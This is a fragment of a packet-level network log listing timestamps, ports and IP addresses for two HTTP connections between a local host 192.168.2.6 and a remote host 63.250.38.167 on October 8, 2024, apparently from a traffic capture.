Oct 8, 2024 11:31:26.767541885 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767551899 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767560005 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767563105 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767584085 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767647982 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767657995 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767673016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767677069 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767683983 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767694950 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767700911 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767704964 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767716885 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767729998 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767745972 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767843962 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.767859936 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767873049 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767878056 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767885923 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767893076 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767899036 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767904043 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767909050 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767915010 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767924070 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767930984 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767939091 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767951012 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767959118 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.767975092 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768079996 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768476009 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768568039 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768579960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768593073 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768604040 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768615961 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768620968 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768627882 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768630028 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768697977 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768708944 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768718958 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768729925 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768732071 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768732071 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768743992 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768754959 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768754959 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768767118 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768781900 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768809080 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768821001 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768834114 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768836975 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.768846989 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.768863916 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769001007 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769198895 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769244909 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769257069 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769399881 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769411087 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769421101 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769429922 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769432068 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769448996 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769454002 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769454956 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769464016 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769474030 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769480944 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769484997 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769494057 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769495010 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769514084 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769519091 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769519091 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769525051 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769536018 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769546032 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769551992 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769555092 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769562960 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769573927 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769586086 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.769598007 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.769614935 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.772586107 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772597075 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772608042 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772639036 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.772733927 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.772804976 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772903919 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772914886 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772926092 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772945881 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772950888 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.772960901 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772972107 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772974014 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.772984982 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.772994995 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773005962 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773011923 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773037910 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773037910 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773061991 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773089886 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773171902 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773183107 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773200035 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773217916 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773230076 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773236036 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773240089 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773251057 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773262024 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773272991 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773272991 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773272991 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773566008 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773576021 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773577929 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773586035 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773595095 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773612976 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773617029 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773627043 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773637056 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773644924 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773650885 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773650885 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773657084 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773669004 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773679018 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.773691893 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773730040 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.773730040 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859673023 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859698057 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859709978 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859721899 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859731913 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859743118 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859755993 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859761000 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859775066 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859775066 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859781027 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859791994 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859803915 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859812975 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859823942 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859834909 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859844923 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859844923 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859848022 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859859943 CEST	80	49996	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:26.859926939 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:26.859972000 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:30.614422083 CEST	49996	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:33.691323996 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:33.696383953 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:33.696476936 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:33.696810007 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:33.701679945 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338495016 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338522911 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338537931 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338551044 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338563919 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338577032 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338577986 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.338589907 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338603973 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338618994 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338619947 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.338634968 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.338645935 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.338685036 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.343744993 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.343831062 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.343877077 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426053047 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426083088 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426096916 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426109076 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426122904 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426151991 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426178932 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426196098 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426213026 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426227093 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426238060 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426238060 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426269054 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426770926 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426786900 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426800013 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426835060 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426851034 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426858902 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.426866055 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.426918983 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.427696943 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.427717924 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.427731037 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.427742004 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.427755117 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.427771091 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.427800894 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.428538084 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.428554058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.428566933 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.428577900 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.428610086 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.431051970 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.431072950 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.431118965 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.520279884 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520301104 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520312071 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520318031 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520323992 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520328999 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520335913 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520340919 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520345926 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520351887 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520487070 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520499945 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520510912 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520526886 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.520545959 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520560026 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520572901 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520586014 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520598888 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.520613909 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.520613909 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.520656109 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521239042 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521251917 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521262884 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521275043 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521281958 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521290064 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521302938 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521303892 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521322966 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521332026 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521333933 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521342039 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521352053 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521357059 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521373034 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.521404982 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.521404982 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.522114992 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522130013 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522144079 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522187948 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522198915 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522209883 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522209883 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.522209883 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.522222042 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522236109 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522250891 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522258997 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.522262096 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522274971 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.522284031 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.522341967 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.523068905 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.523102045 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.523849964 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.614888906 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614917040 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614929914 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614940882 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614953041 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614972115 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614983082 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.614993095 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615004063 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615017891 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615024090 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615029097 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615035057 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615041971 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615046024 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615052938 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615062952 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615070105 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615083933 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615087986 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615097046 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615088940 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615088940 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615108967 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615122080 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615134001 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615187883 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615187883 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615189075 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615360022 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615822077 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615833998 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615844965 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615869999 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615880966 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615892887 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615905046 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.615915060 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615916014 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615948915 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.615993977 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616008997 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616022110 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616034031 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616033077 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616048098 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616060019 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616071939 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616072893 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616085052 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616096020 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616133928 CEST	49997	80	192.168.2.6	63.250.38.167
